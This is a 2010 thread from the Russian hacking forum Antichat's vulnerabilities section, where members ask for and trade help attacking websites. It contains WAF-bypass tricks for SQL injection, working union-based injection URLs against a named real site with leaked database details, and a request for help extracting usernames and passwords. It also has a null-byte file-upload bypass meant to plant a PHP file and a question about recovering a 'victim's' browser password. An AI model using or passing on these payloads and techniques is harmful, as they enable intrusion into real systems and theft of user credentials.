HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.03.2010, 05:31
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами: 9594385

Репутация: 386
По умолчанию

Цитата:
Сообщение от Strilo4ka  
Чем полезен модуль mod_userdir [написал туда] ???
http://wiki.linuxformat.ru/index.php/LXF90:Apache, для хека даст развечто логины пользователей для последующего брутфорса.
 
Ответить с цитированием

  #2  
Старый 03.03.2010, 18:47
2Fed123
Познающий
Регистрация: 26.02.2009
Сообщений: 65
С нами: 9055208

Репутация: 5
По умолчанию

При MSSQL inj WAF удаляет select,какой есть аналог или как обойти?Спасибо
 
Ответить с цитированием

  #3  
Старый 03.03.2010, 18:57
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию

Цитата:
Сообщение от 2Fed123  
При MSSQL inj WAF удаляет select,какой есть аналог или как обойти?Спасибо
/*!select*/
 
Ответить с цитированием

  #4  
Старый 03.03.2010, 19:16
2Fed123
Познающий
Регистрация: 26.02.2009
Сообщений: 65
С нами: 9055208

Репутация: 5
По умолчанию

or+1=(/*!select*/+table_name+from+information_schema.tables)--
ругается Line 1: Incorrect syntax near '/'.
 
Ответить с цитированием

  #5  
Старый 03.03.2010, 20:18
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Если там банальный str_replace, попробуй с регистром поиграть, т.е (к примеру)
Код:
sElEcT
А если же str_ireplace, тогда так:
Код:
seselectlect
Но не факт что сработает, т.к. все вышесказанное основано лишь на догадках.
 
Ответить с цитированием

  #6  
Старый 03.03.2010, 20:21
Pikachu
Новичок
Регистрация: 03.11.2006
Сообщений: 1
С нами: 10273983

Репутация: 0
По умолчанию

Подскажите как мне узнать пароль от сайта в опере, если "жертва" не запоминает пароль и ставит галочку чужой компьютер?
 
Ответить с цитированием

  #7  
Старый 04.03.2010, 01:40
Sharsky
Новичок
Регистрация: 03.03.2010
Сообщений: 9
С нами: 8522087

Репутация: 0
По умолчанию

Не могу до конца раскрутить скул:

Код:
http://www.sixls.com/news.php?id=-3+union+select+1,concat_ws(0x0b, version(), database(), user()),3--
Версия: 5.0.88-community-log
Юзер: sixls_com_-_1
База: sixls@ww1.4what.net

Идут таблицы:

Код:
http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_schema.tables--
Дальше поля:

Код:
http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns--
-----------------------------------------
Я искал на форуме и ни как не мог найти инфу о том как выводить поля, которые находятся в определенной таблице, и как из полей выводить нужные данные, например пароль и и мя пользователя. Заранее спасибо =)
 
Ответить с цитированием

  #8  
Старый 04.03.2010, 02:25
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами: 9898501

Репутация: 257
По умолчанию

Цитата:
Сообщение от Sharsky  
Не могу до конца раскрутить скул:

Код:
http://www.sixls.com/news.php?id=-3+union+select+1,concat_ws(0x0b, version(), database(), user()),3--
Версия: 5.0.88-community-log
Юзер: sixls_com_-_1
База: sixls@ww1.4what.net

Идут таблицы:

Код:
http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_schema.tables--
Дальше поля:

Код:
http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns--
-----------------------------------------
Я искал на форуме и ни как не мог найти инфу о том как выводить поля, которые находятся в определенной таблице, и как из полей выводить нужные данные, например пароль и и мя пользователя. Заранее спасибо =)
Для начала...
http://forum.antichat.ru/thread104591.html
 
Ответить с цитированием

  #9  
Старый 04.03.2010, 07:50
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами: 9361870

Репутация: 58
По умолчанию

как обойти такую конструкцию?)
Цитата:
$uploaddir = "../photos/";
$fext = ".gif";
move_uploaded_file($_FILES[$key]['tmp_name'], $uploaddir . $row['ID'] . "." . $key . $fext)
на $row['ID'] могу влиять)
сделал $row['ID'] = "1.php%00" получил:
Warning: move_uploaded_file(../photos/1.php%00.photo1.jpg) [function.move-uploaded-file]: failed to open stream: Permission denied in /usr/www/users/manager/updateProfile.php on line 814
создать фаил прав не хватает или что то другое?
 
Ответить с цитированием

  #10  
Старый 04.03.2010, 18:22
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от j0ker13  
как обойти такую конструкцию?)

на $row['ID'] могу влиять)
сделал $row['ID'] = "1.php%00" получил:
Warning: move_uploaded_file(../photos/1.php%00.photo1.jpg) [function.move-uploaded-file]: failed to open stream: Permission denied in /usr/www/users/manager/updateProfile.php on line 814
создать фаил прав не хватает или что то другое?
Насколько я понял, ты $row['id'] устанавливаешь методом POST, где данные передаются "как есть", т.е. не url-encoded символы не превращаются в обычные. Попробуй обратится GET'ом, или COOKIE. Если запрос в БД идет через глобальный массив _REQUEST, то должно сработать.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.